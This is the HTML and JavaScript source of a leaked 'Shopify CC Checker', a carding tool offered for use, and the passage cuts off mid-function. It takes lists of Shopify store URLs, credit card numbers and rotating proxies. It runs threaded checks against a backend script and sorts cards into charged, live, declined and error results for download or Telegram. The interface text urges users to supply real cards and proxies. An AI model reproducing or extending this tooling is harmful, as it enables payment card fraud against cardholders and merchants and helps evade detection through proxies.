<!-- 🧠 Cᴏᴘʏ -->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Advanced CC Checker SRC Leak By BasicCoders</title>
    
    <!-- External Libraries -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/particles.js/2.0.0/particles.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.12.2/gsap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/aos/2.3.4/aos.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/aos/2.3.4/aos.css">
    
    <style>
        @import url('https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@300;400;500;600;700&family=Inter:wght@300;400;500;600;700&display=swap');
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Inter', sans-serif;
            background: linear-gradient(135deg, #0a0e1a 0%, #1a1b3a 25%, #2d1b69 50%, #1e293b 75%, #0f172a 100%);
            min-height: 100vh;
            color: #ffffff;
            overflow-x: hidden;
            position: relative;
        }

        /* Enhanced Animated Background */
        #particles-js {
            position: fixed;
            width: 100%;
            height: 100%;
            top: 0;
            left: 0;
            z-index: 1;
        }

        .container {
            position: relative;
            z-index: 2;
            max-width: 420px;
            margin: 0 auto;
            padding: 20px;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
        }

        /* Header */
        .header {
            text-align: center;
            padding: 30px 0 25px;
            animation: fadeInDown 1s ease-out;
        }

        .header h1 {
            font-size: 26px;
            font-weight: 700;
            background: linear-gradient(135deg, #3b82f6 0%, #ef4444 50%, #8b5cf6 100%);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            background-clip: text;
            margin-bottom: 8px;
            letter-spacing: -0.02em;
        }

        .header p {
            font-size: 14px;
            color: #94a3b8;
            font-weight: 400;
            letter-spacing: 0.02em;
        }

        /* Input Sections */
        .input-section {
            margin-bottom: 25px;
            animation: fadeInUp 1s ease-out;
        }

        .input-section:nth-child(2) { animation-delay: 0.2s; }
        .input-section:nth-child(3) { animation-delay: 0.4s; }
        .input-section:nth-child(4) { animation-delay: 0.6s; }

        .section-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 12px;
        }

        .section-title {
            font-size: 15px;
            font-weight: 600;
            color: #e2e8f0;
            letter-spacing: 0.01em;
        }

        .upload-btn {
            background: linear-gradient(135deg, #3b82f6 0%, #1d4ed8 100%);
            color: white;
            border: none;
            padding: 7px 14px;
            border-radius: 10px;
            font-size: 11px;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s ease;
            box-shadow: 0 3px 12px rgba(59, 130, 246, 0.3);
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }

        .upload-btn:hover {
            transform: translateY(-2px);
            box-shadow: 0 5px 18px rgba(59, 130, 246, 0.4);
        }

        /* Textarea Styling */
        .input-container {
            position: relative;
        }

        textarea {
            width: 100%;
            min-height: 110px;
            padding: 16px;
            background: rgba(30, 41, 59, 0.4);
            border: 1px solid rgba(59, 130, 246, 0.2);
            border-radius: 14px;
            color: #ffffff;
            font-family: 'JetBrains Mono', monospace;
            font-size: 13px;
            line-height: 1.4;
            resize: vertical;
            transition: all 0.3s ease;
            backdrop-filter: blur(10px);
        }

        textarea:focus {
            outline: none;
            border-color: rgba(59, 130, 246, 0.6);
            box-shadow: 0 0 0 4px rgba(59, 130, 246, 0.1);
            background: rgba(30, 41, 59, 0.6);
        }

        textarea::placeholder {
            color: #64748b;
            font-weight: 400;
        }

        .file-input {
            display: none;
        }

        .status-display {
            margin-top: 12px;
            padding: 10px 14px;
            background: rgba(15, 23, 42, 0.6);
            border-radius: 10px;
            font-size: 11px;
            color: #94a3b8;
            border: 1px solid rgba(59, 130, 246, 0.1);
            transition: all 0.3s ease;
            font-family: 'JetBrains Mono', monospace;
        }

        .status-display.success {
            background: rgba(34, 197, 94, 0.15);
            border-color: rgba(34, 197, 94, 0.3);
            color: #22c55e;
        }

        .status-display.error {
            background: rgba(239, 68, 68, 0.15);
            border-color: rgba(239, 68, 68, 0.3);
            color: #ef4444;
        }

        /* Thread Configuration - Fixed to 50 */
        .thread-config {
            display: grid;
            grid-template-columns: 1fr 1fr;
            gap: 12px;
            margin-bottom: 20px;
        }

        .thread-input-group {
            display: flex;
            flex-direction: column;
        }

        .thread-label {
            font-size: 12px;
            color: #94a3b8;
            margin-bottom: 6px;
            text-transform: uppercase;
            letter-spacing: 0.5px;
            font-weight: 600;
        }

        .thread-input {
            padding: 10px 12px;
            background: rgba(30, 41, 59, 0.4);
            border: 1px solid rgba(59, 130, 246, 0.2);
            border-radius: 10px;
            color: #ffffff;
            font-family: 'JetBrains Mono', monospace;
            font-size: 12px;
            transition: all 0.3s ease;
            text-align: center;
        }

        .thread-input:focus {
            outline: none;
            border-color: rgba(59, 130, 246, 0.6);
            box-shadow: 0 0 0 3px rgba(59, 130, 246, 0.1);
        }

        /* Controls */
        .controls {
            display: grid;
            grid-template-columns: 1fr 1fr;
            gap: 12px;
            margin-top: 25px;
            animation: fadeInUp 1s ease-out 0.8s both;
        }

        .control-btn {
            padding: 14px 20px;
            border: none;
            border-radius: 14px;
            font-size: 13px;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s ease;
            text-transform: uppercase;
            letter-spacing: 0.5px;
            position: relative;
            overflow: hidden;
        }

        .control-btn::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.1), transparent);
            transition: left 0.5s ease;
        }

        .control-btn:hover::before {
            left: 100%;
        }

        .btn-start {
            background: linear-gradient(135deg, #22c55e 0%, #16a34a 100%);
            color: white;
            box-shadow: 0 4px 15px rgba(34, 197, 94, 0.3);
        }

        .btn-start:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 20px rgba(34, 197, 94, 0.4);
        }

        .btn-stop {
            background: linear-gradient(135deg, #ef4444 0%, #dc2626 100%);
            color: white;
            box-shadow: 0 4px 15px rgba(239, 68, 68, 0.3);
        }

        .btn-stop:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 20px rgba(239, 68, 68, 0.4);
        }

        .btn-clear {
            background: linear-gradient(135deg, #64748b 0%, #475569 100%);
            color: white;
            box-shadow: 0 4px 15px rgba(100, 116, 139, 0.3);
        }

        .btn-clear:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 20px rgba(100, 116, 139, 0.4);
        }

        .btn-settings {
            background: linear-gradient(135deg, #8b5cf6 0%, #7c3aed 100%);
            color: white;
            box-shadow: 0 4px 15px rgba(139, 92, 246, 0.3);
        }

        .btn-settings:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 20px rgba(139, 92, 246, 0.4);
        }

        /* Stats Section - NEW 4-TAB SYSTEM */
        .stats-section {
            margin-top: 25px;
            animation: fadeInUp 1s ease-out 1s both;
        }

        .stats-grid {
            display: grid;
            grid-template-columns: repeat(2, 1fr);
            gap: 12px;
            margin-bottom: 20px;
        }

        .stat-card {
            background: rgba(30, 41, 59, 0.4);
            border: 1px solid rgba(59, 130, 246, 0.2);
            border-radius: 14px;
            padding: 16px;
            text-align: center;
            transition: all 0.3s ease;
            backdrop-filter: blur(10px);
            cursor: pointer;
            position: relative;
            overflow: hidden;
        }

        .stat-card::before {
            content: '';
            position: absolute;
            top: -50%;
            left: -50%;
            width: 200%;
            height: 200%;
            background: conic-gradient(from 0deg, transparent, rgba(59, 130, 246, 0.1), transparent);
            animation: rotate 8s linear infinite;
            z-index: 0;
        }

        .stat-card-content {
            position: relative;
            z-index: 1;
        }

        @keyframes rotate {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .stat-card:hover {
            transform: translateY(-2px);
            background: rgba(30, 41, 59, 0.6);
            border-color: rgba(59, 130, 246, 0.4);
        }

        /* 4-TAB SYSTEM COLORS */
        .stat-card.charge {
            border-color: rgba(251, 191, 36, 0.3);
        }

        .stat-card.charge .stat-number {
            color: #fbbf24;
        }

        .stat-card.live {
            border-color: rgba(34, 197, 94, 0.3);
        }

        .stat-card.live .stat-number {
            color: #22c55e;
        }

        .stat-card.decline {
            border-color: rgba(156, 163, 175, 0.3);
        }

        .stat-card.decline .stat-number {
            color: #9ca3af;
        }

        .stat-card.error {
            border-color: rgba(239, 68, 68, 0.3);
        }

        .stat-card.error .stat-number {
            color: #ef4444;
        }

        .stat-number {
            font-size: 22px;
            font-weight: 700;
            margin-bottom: 4px;
            text-shadow: 0 0 10px currentColor;
            font-family: 'JetBrains Mono', monospace;
        }

        .stat-label {
            font-size: 11px;
            color: #94a3b8;
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }

        /* Thread Status */
        .thread-status {
            margin-bottom: 15px;
            padding: 12px 16px;
            background: rgba(15, 23, 42, 0.8);
            border: 1px solid rgba(139, 92, 246, 0.3);
            border-radius: 12px;
            font-size: 11px;
            color: #8b5cf6;
            font-family: 'JetBrains Mono', monospace;
            text-align: center;
        }

        /* Results Feed */
        .results-section {
            background: rgba(30, 41, 59, 0.4);
            border: 1px solid rgba(59, 130, 246, 0.2);
            border-radius: 14px;
            height: 220px;
            overflow-y: auto;
            backdrop-filter: blur(10px);
            margin-bottom: 20px;
        }

        .results-header {
            background: rgba(15, 23, 42, 0.8);
            padding: 12px 16px;
            border-bottom: 1px solid rgba(59, 130, 246, 0.2);
            font-size: 11px;
            font-weight: 600;
            color: #e2e8f0;
            text-transform: uppercase;
            letter-spacing: 0.5px;
            position: sticky;
            top: 0;
            z-index: 1;
            font-family: 'JetBrains Mono', monospace;
        }

        .result-item {
            padding: 12px 16px;
            border-bottom: 1px solid rgba(59, 130, 246, 0.1);
            font-size: 11px;
            line-height: 1.4;
            transition: background 0.2s ease;
            font-family: 'JetBrains Mono', monospace;
            position: relative;
        }

        .result-item:hover {
            background: rgba(30, 41, 59, 0.3);
        }

        .result-item:last-child {
            border-bottom: none;
        }

        /* 4-TAB SYSTEM RESULT COLORS */
        .result-item.charge {
            border-left: 3px solid #fbbf24;
        }

        .result-item.live {
            border-left: 3px solid #22c55e;
        }

        .result-item.decline {
            border-left: 3px solid #9ca3af;
        }

        .result-item.error {
            border-left: 3px solid #ef4444;
        }

        .result-card {
            font-weight: 600;
            margin-bottom: 4px;
        }

        .result-card.charge {
            color: #fbbf24;
        }

        .result-card.live {
            color: #22c55e;
        }

        .result-card.decline {
            color: #9ca3af;
        }

        .result-card.error {
            color: #ef4444;
        }

        .result-details {
            color: #94a3b8;
        }

        .result-keyword {
            display: inline-block;
            background: rgba(59, 130, 246, 0.2);
            color: #3b82f6;
            padding: 2px 6px;
            border-radius: 6px;
            font-size: 9px;
            font-weight: 600;
            text-transform: uppercase;
            margin-top: 4px;
        }

        /* ERROR RECHECK BUTTON */
        .recheck-btn {
            position: absolute;
            top: 8px;
            right: 8px;
            background: rgba(239, 68, 68, 0.2);
            border: 1px solid rgba(239, 68, 68, 0.3);
            color: #ef4444;
            border-radius: 6px;
            padding: 4px 8px;
            font-size: 9px;
            cursor: pointer;
            transition: all 0.3s ease;
            font-family: 'Inter', sans-serif;
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }

        .recheck-btn:hover {
            background: rgba(239, 68, 68, 0.4);
            transform: scale(1.05);
        }

        /* Console Terminal */
        .console-section {
            background: rgba(15, 23, 42, 0.8);
            border: 1px solid rgba(239, 68, 68, 0.3);
            border-radius: 14px;
            height: 200px;
            overflow-y: auto;
            backdrop-filter: blur(10px);
            font-family: 'JetBrains Mono', monospace;
            margin-bottom: 20px;
        }

        .console-header {
            background: rgba(239, 68, 68, 0.2);
            padding: 10px 16px;
            border-bottom: 1px solid rgba(239, 68, 68, 0.3);
            font-size: 11px;
            font-weight: 600;
            color: #ef4444;
            text-transform: uppercase;
            letter-spacing: 0.5px;
            position: sticky;
            top: 0;
            z-index: 1;
            display: flex;
            align-items: center;
            gap: 8px;
        }

        .console-header::before {
            content: '●';
            color: #22c55e;
            font-size: 12px;
            animation: pulse 2s infinite;
        }

        .console-item {
            padding: 8px 16px;
            font-size: 10px;
            line-height: 1.4;
            transition: background 0.2s ease;
            border-bottom: 1px solid rgba(239, 68, 68, 0.1);
        }

        .console-item:hover {
            background: rgba(239, 68, 68, 0.05);
        }

        .console-item:last-child {
            border-bottom: none;
        }

        .console-timestamp {
            color: #64748b;
            font-size: 9px;
        }

        .console-action {
            color: #22c55e;
            font-weight: 600;
        }

        .console-error {
            color: #ef4444;
            font-weight: 600;
        }

        .console-warning {
            color: #fbbf24;
            font-weight: 600;
        }

        .console-info {
            color: #3b82f6;
            font-weight: 600;
        }

        .console-text {
            color: #94a3b8;
        }

        /* Loading Animation */
        .loading {
            display: none;
            text-align: center;
            margin: 20px 0;
        }

        .loader {
            width: 35px;
            height: 35px;
            border: 3px solid rgba(255, 255, 255, 0.1);
            border-top: 3px solid #3b82f6;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 0 auto 10px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* Developer Information Section */
        .developer-info-section {
            margin-top: 30px;
            padding: 30px 25px;
            background: rgba(15, 23, 42, 0.8);
            border: 1px solid rgba(139, 92, 246, 0.3);
            border-radius: 16px;
            backdrop-filter: blur(15px);
            text-align: center;
            animation: fadeInUp 1s ease-out 1.4s both;
            position: relative;
            overflow: hidden;
        }

        .developer-info-section::before {
            content: '';
            position: absolute;
            top: -50%;
            left: -50%;
            width: 200%;
            height: 200%;
            background: conic-gradient(from 0deg, transparent, rgba(139, 92, 246, 0.05), transparent);
            animation: rotate 10s linear infinite;
            z-index: 0;
        }

        .developer-info-content {
            position: relative;
            z-index: 1;
        }

        .developer-info-title {
            font-size: 24px;
            font-weight: 700;
            color: #8b5cf6;
            margin-bottom: 25px;
            font-family: 'Inter', sans-serif;
            letter-spacing: -0.02em;
        }

        .developer-name {
            font-size: 20px;
            font-weight: 600;
            color: #e2e8f0;
            margin-bottom: 8px;
            font-family: 'Inter', sans-serif;
        }

        .developer-description {
            font-size: 15px;
            color: #94a3b8;
            line-height: 1.5;
            margin-bottom: 30px;
            font-style: italic;
            font-family: 'Inter', sans-serif;
        }

        .developer-links {
            display: flex;
            justify-content: center;
            gap: 25px;
            align-items: center;
        }

        .developer-link {
            display: flex;
            flex-direction: column;
            align-items: center;
            text-decoration: none;
            transition: all 0.3s ease;
            padding: 15px;
            border-radius: 12px;
            background: rgba(30, 41, 59, 0.4);
            border: 1px solid rgba(59, 130, 246, 0.2);
            min-width: 80px;
        }

        .developer-link:hover {
            transform: translateY(-3px);
            background: rgba(30, 41, 59, 0.6);
            border-color: rgba(59, 130, 246, 0.4);
            box-shadow: 0 8px 25px rgba(59, 130, 246, 0.2);
        }

        .telegram-icon {
            width: 40px;
            height: 40px;
            background: linear-gradient(135deg, #229ED9, #0088cc);
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin-bottom: 8px;
            font-size: 20px;
            color: white;
            box-shadow: 0 4px 15px rgba(34, 158, 217, 0.3);
        }

        .developer-link-text {
            font-size: 12px;
            color: #e2e8f0;
            font-weight: 500;
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }

        /* Custom Scrollbar */
        ::-webkit-scrollbar {
            width: 6px;
        }

        ::-webkit-scrollbar-track {
            background: rgba(15, 23, 42, 0.5);
            border-radius: 3px;
        }

        ::-webkit-scrollbar-thumb {
            background: rgba(59, 130, 246, 0.5);
            border-radius: 3px;
        }

        ::-webkit-scrollbar-thumb:hover {
            background: rgba(59, 130, 246, 0.7);
        }

        /* Animations */
        @keyframes fadeInDown {
            from {
                opacity: 0;
                transform: translateY(-30px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        @keyframes fadeInUp {
            from {
                opacity: 0;
                transform: translateY(30px);
            }
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        @keyframes pulse {
            0%, 100% {
                opacity: 1;
            }
            50% {
                opacity: 0.5;
            }
        }

        .pulse {
            animation: pulse 2s infinite;
        }

        /* Responsive */
        @media (max-width: 480px) {
            .container {
                padding: 15px;
            }
            
            .header h1 {
                font-size: 22px;
            }
            
            .controls {
                grid-template-columns: 1fr;
                gap: 10px;
            }
            
            .thread-config {
                grid-template-columns: 1fr;
            }
            
            .developer-links {
                gap: 15px;
            }
            
            .developer-link {
                min-width: 70px;
                padding: 12px;
            }
        }

        /* Settings Modal */
        .modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.8);
            z-index: 1000;
            backdrop-filter: blur(10px);
        }

        .modal-content {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background: linear-gradient(135deg, #1e293b 0%, #0f172a 100%);
            border-radius: 20px;
            padding: 30px;
            width: 90%;
            max-width: 400px;
            border: 1px solid rgba(59, 130, 246, 0.3);
        }

        .modal-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 20px;
        }

        .modal-title {
            font-size: 18px;
            font-weight: 600;
            color: #ffffff;
            font-family: 'JetBrains Mono', monospace;
        }

        .close-btn {
            background: none;
            border: none;
            color: #94a3b8;
            font-size: 24px;
            cursor: pointer;
            transition: color 0.3s ease;
        }

        .close-btn:hover {
            color: #ffffff;
        }

        .settings-group {
            margin-bottom: 20px;
        }

        .settings-label {
            display: block;
            font-size: 13px;
            font-weight: 500;
            color: #e2e8f0;
            margin-bottom: 8px;
        }

        .settings-input {
            width: 100%;
            padding: 12px 16px;
            background: rgba(30, 41, 59, 0.4);
            border: 1px solid rgba(59, 130, 246, 0.2);
            border-radius: 12px;
            color: #ffffff;
            font-family: 'JetBrains Mono', monospace;
            font-size: 13px;
            transition: all 0.3s ease;
        }

        .settings-input:focus {
            outline: none;
            border-color: rgba(59, 130, 246, 0.5);
            box-shadow: 0 0 0 4px rgba(59, 130, 246, 0.1);
        }

        .save-btn {
            width: 100%;
            padding: 12px;
            background: linear-gradient(135deg, #22c55e 0%, #16a34a 100%);
            color: white;
            border: none;
            border-radius: 12px;
            font-size: 13px;
            font-weight: 600;
            cursor: pointer;
            transition: all 0.3s ease;
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }

        .save-btn:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 20px rgba(34, 197, 94, 0.4);
        }

        /* Health Status Indicator */
        .health-indicator {
            position: fixed;
            top: 20px;
            right: 20px;
            width: 12px;
            height: 12px;
            border-radius: 50%;
            z-index: 1000;
            transition: all 0.3s ease;
        }

        .health-indicator.healthy {
            background: #22c55e;
            box-shadow: 0 0 10px rgba(34, 197, 94, 0.5);
        }

        .health-indicator.unhealthy {
            background: #ef4444;
            box-shadow: 0 0 10px rgba(239, 68, 68, 0.5);
        }

        .health-indicator.checking {
            background: #fbbf24;
            box-shadow: 0 0 10px rgba(251, 191, 36, 0.5);
            animation: pulse 1s infinite;
        }
    </style>
</head>
<body>
    <!-- Particles Background -->
    <div id="particles-js"></div>
    
    <!-- Health Indicator -->
    <div class="health-indicator checking" id="healthIndicator" title="Checking endpoint health..."></div>
    
    <div class="container">
        <!-- Header -->
        <div class="header">
            <h1>Advanced Auto Shopify CC Checker Src By Blaze Developer 😎</h1>
            <p>- Shopify fuck 🚬</p>
        </div>

        <!-- Enter Site URLs -->
        <div class="input-section">
            <div class="section-header">
                <span class="section-title">Enter Site URLs</span>
                <button class="upload-btn" onclick="document.getElementById('siteFile').click()">
                    Upload
                </button>
                <input type="file" id="siteFile" class="file-input" accept=".txt" onchange="handleFileUpload(this, 'sites')">
            </div>
            <div class="input-container">
                <textarea id="sitesInput" placeholder="https://site1.myshopify.com&#10;https://site2.myshopify.com" oninput="autoCleanSites()"></textarea>
                <div class="status-display" id="sitesStatus">Lowde site achhi wali dalna</div>
            </div>
        </div>

        <!-- Enter Credit Cards -->
        <div class="input-section">
            <div class="section-header">
                <span class="section-title">Enter Credit Cards</span>
                <button class="upload-btn" onclick="document.getElementById('cardsFile').click()">
                    Upload
                </button>
                <input type="file" id="cardsFile" class="file-input" accept=".txt" onchange="handleFileUpload(this, 'cards')">
            </div>
            <div class="input-container">
                <textarea id="cardsInput" placeholder="5174220000218118|12|2029|107&#10;4111222333344444|05|27|123" oninput="autoCleanCards()"></textarea>
                <div class="status-display" id="cardsStatus">gen card mat dalna bsdk</div>
            </div>
        </div>

        <!-- Enter Proxies -->
        <div class="input-section">
            <div class="section-header">
                <span class="section-title">Enter Proxies </span>
                <button class="upload-btn" onclick="document.getElementById('proxyFile').click()">
                    Upload
                </button>
                <input type="file" id="proxyFile" class="file-input" accept=".txt" onchange="handleFileUpload(this, 'proxies')">
            </div>
            <div class="input-container">
                <textarea id="proxiesInput" placeholder="proxy1.com:8080:user:pass&#10;192.168.1.1:3128&#10;proxy3.com:8080" oninput="autoCleanProxies()"></textarea>
                <div class="status-display" id="proxiesStatus">Bsdk Live rotating proxy webshare ya aur kahi se dhundh ke la</div>
            </div>
        </div>

        <!-- Thread Configuration - Fixed to 50 -->
        <div class="thread-config">
            <div class="thread-input-group">
                <label class="thread-label">Threads (Fixed)</label>
                <input type="number" class="thread-input" id="threadCount" value="5" readonly>
            </div>
            <div class="thread-input-group">
                <label class="thread-label">Delay (ms)</label>
                <input type="number" class="thread-input" id="threadDelay" value="100" min="50" max="5000" onchange="updateThreadStatus()">
            </div>
        </div>

        <!-- Thread Status -->
        <div class="thread-status" id="threadStatus">
            Ready: chudai karo Shopify ki
        </div>

        <!-- Control Buttons -->
        <div class="controls">
            <button class="control-btn btn-start" onclick="startChecking()">
                <i class="fas fa-play"></i> Start
            </button>
            <button class="control-btn btn-stop" onclick="stopChecking()">
                <i class="fas fa-stop"></i> Stop
            </button>
            <button class="control-btn btn-clear" onclick="clearAll()">
                <i class="fas fa-trash"></i> Clear
            </button>
            <button class="control-btn btn-settings" onclick="openSettings()">
                <i class="fas fa-cog"></i> Settings
            </button>
        </div>

        <!-- Loading Animation -->
        <div class="loading" id="loading">
            <div class="loader"></div>
            <p style="font-size: 12px; color: #94a3b8;">Processing with 5 threads...</p>
        </div>

        <!-- Stats Section - NEW 4-TAB SYSTEM -->
        <div class="stats-section">
            <div class="stats-grid">
                <div class="stat-card charge" onclick="downloadResults('charge')">
                    <div class="stat-card-content">
                        <div class="stat-number" id="chargeCount">0</div>
                        <div class="stat-label">Charge</div>
                    </div>
                </div>
                <div class="stat-card live" onclick="downloadResults('live')">
                    <div class="stat-card-content">
                        <div class="stat-number" id="liveCount">0</div>
                        <div class="stat-label">Live</div>
                    </div>
                </div>
                <div class="stat-card decline" onclick="downloadResults('decline')">
                    <div class="stat-card-content">
                        <div class="stat-number" id="declineCount">0</div>
                        <div class="stat-label">Decline</div>
                    </div>
                </div>
                <div class="stat-card error" onclick="downloadResults('error')">
                    <div class="stat-card-content">
                        <div class="stat-number" id="errorCount">0</div>
                        <div class="stat-label">Errors</div>
                    </div>
                </div>
            </div>

            <!-- Results Feed -->
            <div class="results-section">
                <div class="results-header">
                    <i class="fas fa-stream"></i> Live Results Feed
                </div>
                <div id="resultsContainer"></div>
            </div>

            <!-- Console Terminal -->
            <div class="console-section">
                <div class="console-header">
                    <i class="fas fa-terminal"></i> Developer Console
                </div>
                <div id="consoleContainer"></div>
            </div>
        </div>

        <!-- Developer Information Section -->
        <div class="developer-info-section">
            <div class="developer-info-content">
                <h2 class="developer-info-title">Developer Information</h2>
                
                <div class="developer-name">SRC Leaked By BasicCoders</div>
                
                <div class="developer-description">
                    just made for fun added more security and upgraded,must join my channel coded related stuffs
                </div>
                
                <div class="developer-links">
                    <a href="https://t.me/BLAZE_X_007" class="developer-link" target="_blank">
                        <div class="telegram-icon">
                            <i class="fab fa-telegram-plane"></i>
                        </div>
                        <span class="developer-link-text">Contact</span>
                    </a>
                    
                    <a href="https://t.me/wiz_x_chk" class="developer-link" target="_blank">
                        <div class="telegram-icon">
                            <i class="fab fa-telegram-plane"></i>
                        </div>
                        <span class="developer-link-text">Channel</span>
                    </a>
                </div>
            </div>
        </div>
    </div>

    <!-- Settings Modal -->
    <div class="modal" id="settingsModal">
        <div class="modal-content">
            <div class="modal-header">
                <h3 class="modal-title">Advanced Settings</h3>
                <button class="close-btn" onclick="closeSettings()">&times;</button>
            </div>
            <div class="settings-group">
                <label class="settings-label">Telegram Chat ID</label>
                <input type="text" class="settings-input" id="telegramChatId" placeholder="Your Telegram Chat ID">
            </div>
            <div class="settings-group">
                <label class="settings-label">Request Timeout (seconds)</label>
                <input type="number" class="settings-input" id="requestTimeout" value="400" min="60" max="600">
            </div>
            <div class="settings-group">
                <label class="settings-label">Max Retries per Request</label>
                <input type="number" class="settings-input" id="maxRetries" value="2" min="1" max="5">
            </div>
            <button class="save-btn" onclick="saveSettings()">
                <i class="fas fa-save"></i> Save Settings
            </button>
        </div>
    </div>

    <script>
        // Global Configuration
        const API_ENDPOINT = './api.php';
        
        // Global State - Rohit
        let isChecking = false;
        let activeThreads = 0;
        let threadPool = [];
        let stats = {
            charge: 0,
            live: 0,      // Live + 3DS combined
            decline: 0,   // Decline/Dead
            error: 0,     // Errors
            total: 0
        };
        let results = {
            charge: [],
            live: [],     // Live + 3DS combined
            decline: [],  // Decline/Dead
            error: []     // Errors
        };
        let settings = {
            telegramChatId: '',
            requestTimeout: 400,  // 400 SECONDS TIMEOUT
            maxRetries: 2
        };
        let healthStatus = 'checking';
        let devStats = {
            totalRequests: 0,
            successfulRequests: 0,
            totalTime: 0
        };

        // Error recheck queue
        let errorRecheckQueue = [];

        // Fixed thread count
        const MAX_THREADS = 5;

        // Initialize Enhanced Particles
        function initParticles() {
            particlesJS('particles-js', {
                particles: {
                    number: { value: 60, density: { enable: true, value_area: 800 } },
                    color: { value: ["#3b82f6", "#ef4444", "#8b5cf6"] },
                    shape: { type: "circle" },
                    opacity: { value: 0.4, random: false },
                    size: { value: 2, random: true },
                    line_linked: { 
                        enable: true, 
                        distance: 150, 
                        color: "#3b82f6", 
                        opacity: 0.2, 
                        width: 1 
                    },
                    move: { 
                        enable: true, 
                        speed: 3, 
                        direction: "none", 
                        random: false, 
                        straight: false, 
                        out_mode: "out", 
                        bounce: false 
                    }
                },
                interactivity: {
                    detect_on: "canvas",
                    events: { 
                        onhover: { enable: true, mode: "repulse" }, 
                        onclick: { enable: true, mode: "push" }, 
                        resize: true 
                    },
                    modes: { 
                        repulse: { distance: 100, duration: 0.4 }, 
                        push: { particles_nb: 4 } 
                    }
                },
                retina_detect: true
            });
        }

        // Update Thread Status Display
        function updateThreadStatus() {
            const threadDelay = document.getElementById('threadDelay').value;
            const status = `Ready: 5 threads with ${threadDelay}ms delay`;
            document.getElementById('threadStatus').textContent = status;
            logToConsole(`Thread configuration: 5 threads, ${threadDelay}ms delay,`, 'info');
        }

        // Enhanced Thread Management for 50 threads
        class ThreadManager {
            constructor() {
                this.maxThreads = 5; // Fixed
                this.delay = 100;
                this.activeThreads = 0;
                this.queue = [];
                this.isRunning = false;
            }

            async addTask(task) {
                return new Promise((resolve, reject) => {
                    this.queue.push({ task, resolve, reject });
                    this.processQueue();
                });
            }

            async processQueue() {
                if (!this.isRunning || this.activeThreads >= this.maxThreads || this.queue.length === 0) {
                    return;
                }

                const { task, resolve, reject } = this.queue.shift();
                this.activeThreads++;

                try {
                    const result = await task();
                    resolve(result);
                } catch (error) {
                    reject(error);
                } finally {
                    this.activeThreads--;
                    
                    // Update thread status
                    document.getElementById('threadStatus').textContent = 
                        `Active: ${this.activeThreads}/5 threads | Queue: ${this.queue.length} |`;
                    
                    // Add delay between requests
                    if (this.delay > 0) {
                        await new Promise(resolve => setTimeout(resolve, this.delay));
                    }
                    
                    // Process next task
                    setTimeout(() => this.processQueue(), 10);
                }
            }

            start() {
                this.isRunning = true;
                this.processQueue();
            }

            stop() {
                this.isRunning = false;
                this.queue = [];
                this.activeThreads = 0;
                document.getElementById('threadStatus').textContent = 
                    'Stopped: 0/5 threads | Queue: 0 |';
            }

            updateDelay(delay) {
                this.delay = delay;
                updateThreadStatus();
            }
        }

        let threadManager = new ThreadManager();

        // Auto Clean Sites Function
        function autoCleanSites() {
            const input = document.getElementById('sitesInput').value;
            if (!input.trim()) return;

            const lines = input.split('\n');
            const cleanedSites = new Set();

            lines.forEach(line => {
                const urls = extractUrls(line);
                urls.forEach(url => {
                    try {
                        const urlObj = new URL(url);
                        const cleanUrl = `${urlObj.protocol}//${urlObj.hostname}/`;
                        cleanedSites.add(cleanUrl);
                    } catch (e) {
                        const fixed = fixUrl(line.trim());
                        if (fixed) cleanedSites.add(fixed);
                    }
                });
            });

            if (cleanedSites.size > 0) {
                const cleaned = Array.from(cleanedSites);
                document.getElementById('sitesInput').value = cleaned.join('\n');
                document.getElementById('sitesStatus').textContent = `✓ Auto-cleaned ${cleaned.length} unique sites`;
                document.getElementById('sitesStatus').className = 'status-display success';
                logToConsole(`Auto-cleaned ${cleaned.length} unique sites`, 'success');
            }
        }

        // Extract URLs from text
        function extractUrls(text) {
            const urlRegex = /https?:\/\/[^\s<>"{}|\\^`[\]]+/gi;
            const domainRegex = /[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.(?:myshopify\.com|com|net|org|io|co|shop|store|online|site)[^\s]*/gi;
            
            let urls = [];
            
            const fullUrls = text.match(urlRegex) || [];
